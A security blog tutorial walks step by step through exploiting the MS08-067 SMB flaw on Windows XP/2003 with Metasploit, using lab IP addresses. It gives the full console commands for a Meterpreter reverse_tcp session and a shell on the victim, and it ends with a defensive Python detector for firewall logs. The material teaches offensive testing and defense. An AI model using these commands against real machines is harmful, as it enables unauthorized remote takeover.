Take remote control over a windows XP / 2003 machine with Metasploit

[Read this post in Spanish]

There are several posts and videos showing this procedure, but as we have received several questions about this topic we’ll show you how to use Metasploit to take remote control over a Windows XP / 2003 machine.

In this post we’ll take advantage of the MS08-067 vulnerability, a flaw in the Windows netapi component that is reachable over the SMB protocol and allows arbitrary code execution. For this, we’ll use two machines: one with Metasploit (this can be Windows or Linux) and a Windows XP victim (this can also be a Windows 2003).

To get started first let’s open the Metasploit console with the command:

# msfconsole

Now, let’s select the exploit module for this vulnerability with the following command:

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) >

Now that the prompt reflects the name of the vulnerability, let’s execute the following command to see how it should be configured:

msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use

Exploit target:
Id  Name
--  ----
0   Automatic Targeting

The first option, RHOST, is the name or IP address of the Windows XP victim we want to attack. RPORT and SMBPIPE are mandatory options that indicate the port the exploit is sent to and the named pipe used for the connection. There’s no need to modify these last two values.

To configure the IP of the XP victim, let’s execute the following command:

msf  exploit(ms08_067_netapi) > set RHOST 192.168.75.90
RHOST => 192.168.75.90

where 192.168.75.90 is the actual IP address of the victim.

The “Exploit target” section indicates which platforms this exploit can be used against. The following command lists all platforms vulnerable to this exploit:

msf  exploit(ms08_067_netapi) > show targets
Exploit targets:
Id  Name
--  ----
0   Automatic Targeting
1   Windows 2000 Universal
2   Windows XP SP0/SP1 Universal
3   Windows XP SP2 English (AlwaysOn NX)

From the list above we can see that the current value “0” selects automatic identification of the victim’s platform. This option is enough and there’s no need to modify it. If you wish, you can change this value to define your target manually with the following command:

msf  exploit(ms08_067_netapi) > set target 1
target => 1

Now we have to configure the payload used by our exploit. The payload tells Metasploit what to do once the exploit has been successfully executed on the victim’s machine. We set it with the following command:

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

The “reverse_tcp” payload runs a reverse client on the XP machine: it connects back to our Metasploit machine, by default on port 4444. This payload is the one that will allow us to take control over the XP victim. To tell the victim where to connect, we have to set the following option:

msf  exploit(ms08_067_netapi) > set LHOST 192.168.75.35
LHOST => 192.168.75.35

where 192.168.75.35 is the IP address of your own Metasploit machine.

With all these steps we are now ready to execute the attack. If we execute the “show options” command we’ll see the final configuration of our exploit:

msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST    192.168.75.90    yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
LHOST     192.168.75.35    yes       The listen address
LPORT     4444             yes       The listen port

Exploit target:
Id  Name
--  ----
0   Automatic Targeting

If everything looks correct, we launch the attack by executing the “exploit” command and wait for the exploit to complete:

msf  exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.75.35:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.75.90
[*] Meterpreter session 1 opened (192.168.75.35:4444 -> 192.168.75.90:1049) at 2013-04-08 18:53:58 -0500
meterpreter >

The “meterpreter >” prompt indicates that we are now ready to control the XP machine. To confirm that we are indeed inside this machine, let’s execute the “sysinfo” command:

meterpreter > sysinfo
Computer        : TMWINXP01
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : es_MX
Meterpreter     : x86/win32

Now we can also execute the “shell” command to obtain a command prompt on the victim’s machine and start running commands:

meterpreter > shell
Process 1652 created.
Channel 1 created.
Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

And there you go! We are now controlling the victim’s machine. In some situations you may not receive the expected meterpreter session, but something similar to the following lines instead. In these cases you may assume the port we are trying to reach is closed or the attack is being detected by an IPS.

msf  exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.75.35:4444
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout 
The connection timed out (192.168.75.90:445).

The most probable reason for this is the presence of a firewall, whether an external one or the Windows firewall; in this case the exploit cannot be delivered. If you want to verify that the port is closed, you can execute the following command from Metasploit:

msf  exploit(ms08_067_netapi) > nmap 192.168.75.90
[*] exec: nmap 192.168.75.90
Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-08 19:18 CDT
Nmap scan report for 192.168.75.90
Host is up (0.00019s latency).
All 1000 scanned ports on 192.168.75.90 are filtered
MAC Address: 00:0C:29:4E:E1:93 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 34.51 seconds

This result confirms the victim is behind a firewall. In this case we would need another vulnerability / exploit to take remote control of the victim.
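As an added example (not code from the original post), here is a small Python detector for the pattern this post shows from the network’s point of view: inbound SMB on port 445 followed by the victim connecting back to the same peer, which is how the reverse_tcp session at 192.168.75.35:4444 would appear in a firewall log, together with the dropped-SMB case that produces the “unreachable” error. The log format, the 60-second window and the sample lines are assumptions constructed for this example.

```python
"""Added example (not from the original post): spot the reverse_tcp pattern
described above in firewall connection logs. A host that accepted inbound SMB
(TCP/445) and then opened an outbound connection back to that same peer within
a short window looks like a Meterpreter stage calling home (LPORT defaults to
4444, but any port is counted). Log format, addresses and times are constructed.
"""
from collections import defaultdict
from datetime import datetime

SMB_PORT = 445
WINDOW_SECONDS = 60  # assumption: the stage follows the exploit within a minute

# Constructed log lines: "<time> <src>:<sport> -> <dst>:<dport> <verdict>"
SAMPLE_LOG = """\
2013-04-08T18:53:40 192.168.75.35:49201 -> 192.168.75.90:445 ACCEPT
2013-04-08T18:53:58 192.168.75.90:1049 -> 192.168.75.35:4444 ACCEPT
2013-04-08T19:18:02 192.168.75.35:49300 -> 192.168.75.91:445 DROP
2013-04-08T19:40:00 192.168.75.20:52000 -> 192.168.75.90:445 ACCEPT
2013-04-08T20:10:00 192.168.75.90:1100 -> 192.168.75.20:80 ACCEPT
"""

def parse_line(line):
    ts, src, _arrow, dst, verdict = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), sip, int(sport), dip, int(dport), verdict

def analyse(log_text):
    """Return (sessions, blocked): sessions holds (victim, peer, callback_port,
    seconds_after_smb) for each suspected reverse connection; blocked holds
    (src, dst) for SMB connections the firewall dropped, which is the
    'Exploit failed [unreachable]' outcome shown in the post."""
    inbound_smb = defaultdict(list)  # (victim, peer) -> times SMB was accepted
    sessions, blocked = [], []
    for raw in filter(str.strip, log_text.splitlines()):
        ts, sip, sport, dip, dport, verdict = parse_line(raw)
        if dport == SMB_PORT:
            if verdict == "DROP":
                blocked.append((sip, dip))
            else:
                inbound_smb[(dip, sip)].append(ts)
            continue
        # Any other connection from a host that recently accepted SMB from the
        # same peer is reported, whatever the destination port happens to be.
        for smb_ts in inbound_smb.get((sip, dip), []):
            delta = (ts - smb_ts).total_seconds()
            if 0 <= delta <= WINDOW_SECONDS:
                sessions.append((sip, dip, dport, delta))
                break
    return sessions, blocked
```

The last two sample lines show the window at work: an outbound web connection half an hour after an accepted SMB connection is not reported.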

Remember to send us your questions and comments to our Twitter account: @redinskala where you will find more information and security tips.

Thanks for your visit!
